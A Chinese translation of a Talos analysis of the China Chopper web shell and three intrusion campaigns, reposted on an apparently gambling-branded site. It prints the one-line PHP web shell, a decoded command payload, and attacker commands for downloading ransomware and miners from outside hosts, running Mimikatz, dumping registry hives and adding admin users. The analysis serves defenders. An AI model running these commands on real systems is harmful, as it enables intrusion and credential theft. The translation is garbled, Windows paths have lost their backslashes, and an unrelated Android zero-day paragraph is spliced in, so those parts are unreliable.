九年后“中国菜刀”照旧锋利:China Chopper三起进击案例理会 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

九年后“中国菜刀”照旧锋利:China Chopper三起进击案例理会

申博_新闻事件 申博 37次浏览 未收录 0个评论

引见

过去发现的挟制常常会随着时刻的推移而逐渐退出于公众视野中,但China Chopper却对峙了悠久的生命力。

在过去两年的时刻里,思科Talos团队视察到China Chopper多量活动的踪迹,有数个挟制组织将China Chopper融入到其行为中,这表明,即使距China Chopper首次发现已过了九年,对部分挟制行为者而言它却照旧能起到关键的作用。本文将遴选其中最生动的三次行为来理会。

China Chopper是一种web shell,能让进击者经过进程包括控制目的所需统统逻辑的客户端应用递次保留对受感染体系的访问权限。

China Chopper是广泛可用的,几乎任何人都可以应用它。这也意味着,仅以China Chopper的存在作为目的,几乎不可以将进击归咎于某个特定群体。

China Chopper的“老当益壮”也间接说清晰清晰明了许多看似老旧挟制永远不会真正消失,互联网的防御者们不应该只把目光放到一些新的歹意软件上。

什么是China Chopper?

China Chopper是一类东西,允许进击者远程控制目的体系,条件是体系需要运转web效力器应用递次。Web shell可以在差异的平台上运转,但在本例中,我们只关注受感染的Windows主机。China Chopper已被证实由一些国家支持的挟制团体,如Leviathan、Threat Group-3390等在应用。

在钻研中我们发现,Internet Information Services (IIS)和Apache web效力器都遭到过China Chopper web shell的进击。我们没有关于web shell是如何装配的信息,但是推敲到有一些web应用递次框架,比如老版本的Oracle WebLogic或WordPress,它们当中包括的远程代码实行马脚可以使自身成了进击目的。

China Chopper为进击者供给了一个俭朴的GUI,允许他们设置到效力器的链接,并生成效力器端代码,这些代码必须增添到目的网站的代码后才举办通信。

效力器端代码非常俭朴,只包括一行代码,根据应用递次平台的差异有所改变。后门支持.NET Active Server Pages或PHP。

以下是受感染的PHP应用递次的效力器端代码示例:

<?php @eval($_POST['test']);?>

我们并不能一定,效力器代码的如此俭朴是否是是China Chopper开辟人员为了增添检测的难度而故意为之,但是在短代码片段上应用情势婚配可以会发作一些误报。

China Chopper客户端应用HTTP POST请求与受感染的效力器通信。效力器端代码的唯一服从是评价在客户端GUI中设置效力器代码时代指定的请求参数。在我们的示例中,预期的参数名称是“test”。经过进程HTTP的通信,可以很随意马虎在捕获网络数据包后发现。

China Chopper包括一个远程shell(虚拟终端)服从,它起首会提议应用敕令 ‘netstat an|find “ESTABLISHED.”‘,在受感染体系上的进程直立日志中极可以会看到此敕令。

当我们理会捕获的数据包时,可以看到参数“test”包括另一个eval语句。

根据该敕令,客户端将提交一定数目的参数,z0一向到zn。在提交之前,统统参数都应用范例base64编码器举办编码。参数z0一向包括理会其他参数、启动请求的敕令并将结果返回给客户机的代码。

带参数的编码China Chopper POST请求:

test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D

在此请求中,解码的参数是:

z0 - @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
 
z1 - cmd
 
z2 - cd /d "C:\xampp\htdocs\dashboard\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]

敕令的末尾“&echo [S]&cd&echo [E]”彷佛出如今统统虚拟终端请求中,可以作为一个牢固的指示器来检测数据包捕获或行为日志中的China Chopper活动。

除了终端,China Chopper还包括一个文件管理器(可以直立目录、下载文件和更改文件元数据)、一个数据库管理器和一个基础的马脚扫描器。

下面是我们对三次行为的叙说,它们告别有差异的目的、东西、技术及(可以差异的)挟制团伙。

案例钻研1:针对亚洲政府组织的间谍行为

我们在一再间谍活动中一定了China Chopper的应用状态,其中一次针对亚洲政府组织的行为中,China Chopper被用于内部网络,装配在了一些用于存储机密文档的Web效力器上。

进击者的目的是猎取文档和数据库副本。文件应用WinRAR自动压缩:

cd /d C:\Windows\Working_Directory\
renamed_winrar a -m3 -hp19_Characters_Complex_Password -ta[date] -n*.odt -n*.doc -n*.docx -n*.pdf  -n*.xls -n*.xlsx  -n*.ppt -n*.pptx  -r c:\output_directory\files.rar c:\directory_to_scan\

此条敕令用于直立一个文档,其中有将日期作为参数举办修改后的文件。文档由包括大写、小写和迥殊字符组成的强密码保护,密码长度高出15个字符。

我们猜想,进击者会定期运转此条敕令,以便只猎取新文档并将被偷取的数据量最小化。

在一致目的上,我们用WinRAR一定了经过进程China Chopper实行的其他敕令:

rar a -inul -ed -r -m3 -taDate -hp ~ID.tmp c:directory_to_scan

鉴于China Chopper是一个群众东西,我们没法揣摸在这类状态下进击者是否是相同。但是这里的rar敕令行是完全差异的,可以表明是差异进击者所为。

进击者安排了其他东西来实行体系上的敕令:

C:windowsMicrosoft.NETFrameworkv2.0.50727MSBuild.exe C:windowstempDocument.csproj  /p:AssemblyName=C:windowstempdownloader.png /p:ScriptFile=C:windowstempdownloader.dat /p:Key=27_characters_key > random.tmp

MSBuild.exe用于编译和实行带有两个参数的.NET应用递次:ScriptFile参数包括一个PowerShell脚本,该脚本应用key参数的值加密。.NET代码以下:

九年后“中国菜刀”照旧锋利:China Chopper三起进击案例理会

图4..NET加载递次代码

.NET加载递次支持加密的文件或URL作为脚本参数。如果支配人员应用HTTP请求,则加载递次将应用其中一个硬编码的用户代办下载payload。加载器解密下载的文件并实行:

九年后“中国菜刀”照旧锋利:China Chopper三起进击案例理会

图5.硬编码的用户代办字符串

在本例中,解密payload的目的是实行数据库转储:

powershell.exe -exe bypass -nop -w hidden -c Import-Module C:windowshelphelphelper.ps1;
Run-MySQLQuery -ConnectionString 'Server=localhost;Uid=root;Pwd=;database=DBName;
Convert Zero Datetime=True' -Query 'Select * from table where UID > 'Value' -Dump

SQL查询中的“where UID”条件与前面的WinRAR敕令中的日期具有相同的目的。我们假定进击者是定期实行查询,而且不希望转储悉数数据库,只想转储新条目。值得注意的是,转储数据后,进击者会搜检生成的文件是否是可用,以及是否是包括任何数据:

dir /O:D c:working_directorydb.csv
powershell -nop -exec bypass Get-Content "c:working_directorydb.csv" | Select-Object -First 10

那么存档文件和数据库转储是如何滤出的呢?因为目的效力器位于内部网络中,进击者只需映照一个本地驱动器并将文件复制到它就能做到。

6个月没有补丁的Android 0 day权限提拔破绽

9月4日,研究人员在网上宣布了影响安卓挪动操作体系的0 day破绽。 该破绽位于Video for Linux (V4L2)驱动文件中,该文件用于安卓操作体系措置责罚输入数据。输入歹意输入后,攻击者可以应用V4L2驱动文件来从低权限用户提拔到root权限。但为了应用该破绽,攻击者起首要在目的体系上取得实行低权限代码的才能。虽然该0 day破绽并不能用于突破用户的手机,但可以让攻击者在初

cd /d C:working_directory
net use 192.168.0.10ipc$ /user:USER PASSWORD
move c:working_directorydb.csv 192.168.0.10destination_directory

进击者必须可以访问远程体系才滤出数据。我们已看到进击者应用HTTP隧道东西,在受感染的体系和C2效力器之间直立网络隧道。

案例2:针对黎巴嫩组织的频频进击行为

第二个案例是一同针对黎巴嫩组织的进击行为。第一个案例描写的目的是走漏内部效力器的数据,但这个案例的状态恰好相反——一个群众web站点因为差异的目的而遭到数名进击者的进击。

进击者应用China Chopper在效力器上安排敲诈软件,第一次是Sodinokibi敲诈软件:

certutil.exe -urlcache -split -f hxxp://188.166.74[.]218/radm.exe C:UsersUserAAppDataLocalTempradm.exe

第二次是Gandcrab敲诈软件:

If($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){
Start-Process -FilePath "$Env:WINDIRSysWOW64WindowsPowerShellv1.0powershell.exe" -argument "IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33'));
Invoke-ACAXGZFTTDUDKY;
Start-Sleep -s 1000000;"
} else {
IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/Hd7BmJ33'));
Invoke-ACAXGZFTTDUDKY;
Start-Sleep -s 1000000;
}

以下是托管在Pastebin的脚本:

九年后“中国菜刀”照旧锋利:China Chopper三起进击案例理会

图6.从pastebin.com下载的反射装载器

该脚本应用反射DLL加载技术实行位于脚本末尾的硬编码PE文件——Gandcrab。

除了敲诈软件之外,我们还发清晰清晰明了另一个试图应用China Chopper在效力器上实行加密钱银挖矿递次的进击者:

Powershell -Command -windowstyle hidden -nop -enc -iex(New-Object Net.WebClient).DownloadString('hxxp://78.155.201[.]168:8667/6HqJB0SPQqbFbHJD/init.ps1')

下面来看一下矿机设置:

九年后“中国菜刀”照旧锋利:China Chopper三起进击案例理会

图7.矿机设置

一些检测到的活动多是手工举办的,目的是为了取得OS凭据。

以及试图取得注册表:

reg save hklmsam sam.hive
reg save hklmsystem system.hive
reg save hklmsecurity security.hive

应用Mimikatz(进程中有一些小题目):

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz >>c:\1.txt
 
powershell IEX","(New-Object","Net.WebClient).DownloadString('hxxp://is[.]gd/oeoFuI'); Invoke-Mimikatz -DumpCreds
 
C:\Windows\System32WindowsPowerShell\v1.0\powershell.exe IEX
 
(New-Object","Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz
 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [Environment]::Is64BitProcess
 
powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz >>c:\1.txt

试图应用PowerShell模块和敕令行转储密码哈希:

IEX (New-Object
 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Get-PassHashes.ps1');Get-PassHashes;

进击者还尝试在lsass.exe上应用procdump64.exe来猎取存储在内存中的本地凭据。 除了频频尝试转储凭据之外,进击者还必须措置责罚输入缺点:遗漏空格、缺点敕令或字母切换。

其中一名进击者成功取得了凭据,并试图经过进程应用凭据和“net use”敕令在内部举办转换。

最后,机器上还安排了几个远程访问东西,如Gh0stRAT和Venom多跳代办,以及隧道在PowerShell中编写的远程shell。

案例3:进击网络托管效力供给商

在一次行为中,我们发现一家亚洲网络主机供给商遭到了进击,其中多量进击发作在10个月的时刻里,触及多个Windows效力器。一样,我们不能一定挟制行为者是单人还是多组,因为遭到进击的效力器有所而异。我们这里只说视察到的部分行为。

效力器1

平常进击者会试图直立一个新用户,然后将该用户增添到具有管理权限的用户组中,这多是为了访问和修改托管在单个物理效力器上的其他web应用递次。

cd /d C:\compromisedappdirectory&net user user pass /add
cd /d C:\compromisedappdirectory&net localgroup administrattors user /add

注意单词“administrators”的拼写缺点。进击者意想到增添用户的体式款式不能成功,又尝试了一种差异的技术。他们下载并装配密码偷取东西“Mimikatz Lite”,俭朴修改源代码的归档文件作为GetPassword.exe。

该东西能视察Local Security Authority Subsystem的内存空间,以查找、解密和展示检索到的密码。与原始东西对比,唯一的变化是进击者更改了敕令窗口的颜色和代码页,让绿色文本展如今黑色背景上,并将活动控制台代码页更改为中文代码页936。

最后,进击者将数据转储到一款流行的手机游戏——“Clash of Kings”的数据库上,该游戏可以托管在一个私有效劳器上。

效力器2

第二台效力器上,有一名进击者成功装上了China Chopper,别的我们还发清晰清晰明了加密钱银挖矿机。

共集资和起首重置Windows临时文件文件夹的访问控制列表,并取得该文件夹的统统权,然后允许矿机经过进程Windows防火墙实行,最后启动挖矿payload。

C:Windowssystem32icacls.exe C:WindowsTemp /Reset /T
C:Windowssystem32takeown.exe /F C:WindowsTemp
C:Windowssystem32netsh.exe Firewall Add AllowedProgram C:WindowsTemplsass.eXe Windows Update Enable
C:WindowsTemplsass.eXe

效力器3

对此效力器的进击起首是下载多量悍然或是私有的东西,但我们没法检索它们。

进击者试图应用CVE-2018-8440(Windows中的一个提权马脚)。

cd /d C:directoryofcompromisedapp&rundll32 C:directoryofcompromisedappALPC-TaskSched-LPE.dll,a

接着进击者启动几个自定义东西和一个可用东西,可用东西会直立一个新的用户iis_uses并更改DACLs,以允许用户修改某些支配体系对象。

进击者取得所需的特权,并启动一些其他东西来修改受影响效力器上运转的统统网站的访问控制列表(acl)。这样做极可以会毁伤其他网站。

cacls . C:path_to_a_website /T /E /C /G Everyone:F

最后,进击者启动Powershell Mimikatz loader,从内存中猎取更多凭据,并将凭据保留到文本文件中:

powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz|Out-File
-Encoding ASCII outputfile.txt

效力器4

进击从下载和实行两个文件最早,这两个文件是马脚应用文件,应用的是Windows马脚CVE-2015-0062,CVE-2015-1701和CVE-2016-0099,能让进击者修改效力器上的其他对象。

权限升级成功后,进击者会增添新用户帐户并将该帐户增添到管理组。

net user admin admin /ad
net localgroup administrators admin /ad

进击者接下来应用新直立的用户帐户登录到效力器,并启动一个免费的东西replacestudio32——一个GUI有用递次,可以轻松地搜索基于文本的文件,并用另一个字符串实行替换。一样,这可以用于影响效力器上承载的统统站点,也许俭朴地破坏页面。

结论

不安然的Web应用递次为进击者供给了有效的切入点,让他们能装配如Web shell之类的东西举办侦察。

尽管China Chopper是一个陈腐的东西,但我们依旧看到它被多组挟制团伙应用,在本文中,我们展示了三类差异状态下,进击者们所应用的一些东西,技术和流程。而且因为China Chopper易于应用,所以没法将其关联到任何特定的团体。

在我们的钻研中,我们记录了在几个月内生动最频繁的三次行为。这证清晰明了探测入侵的匀称时刻高出180天的说法,并意味着防御者应该推敲在最坏的状态下来直立他们的安然团队和措置责罚流程。重要的是,事件响应团队应该具有主动寻找马脚的权限,不仅要响应自动检测体系引发的警报或是由一线安然理会师举办升级。

在保护基础架构时,应用最新的安然修补递次对峙内部和外部Web效力器、应用递次和框架的最新状态是非常重要的,能下落已知马脚带来的风险。

相信China Chopper在短期内仍不会消失,没准我们会在未来的进击行为中频繁撞见。

本文翻译自:https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明九年后“中国菜刀”照旧锋利:China Chopper三起进击案例理会
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址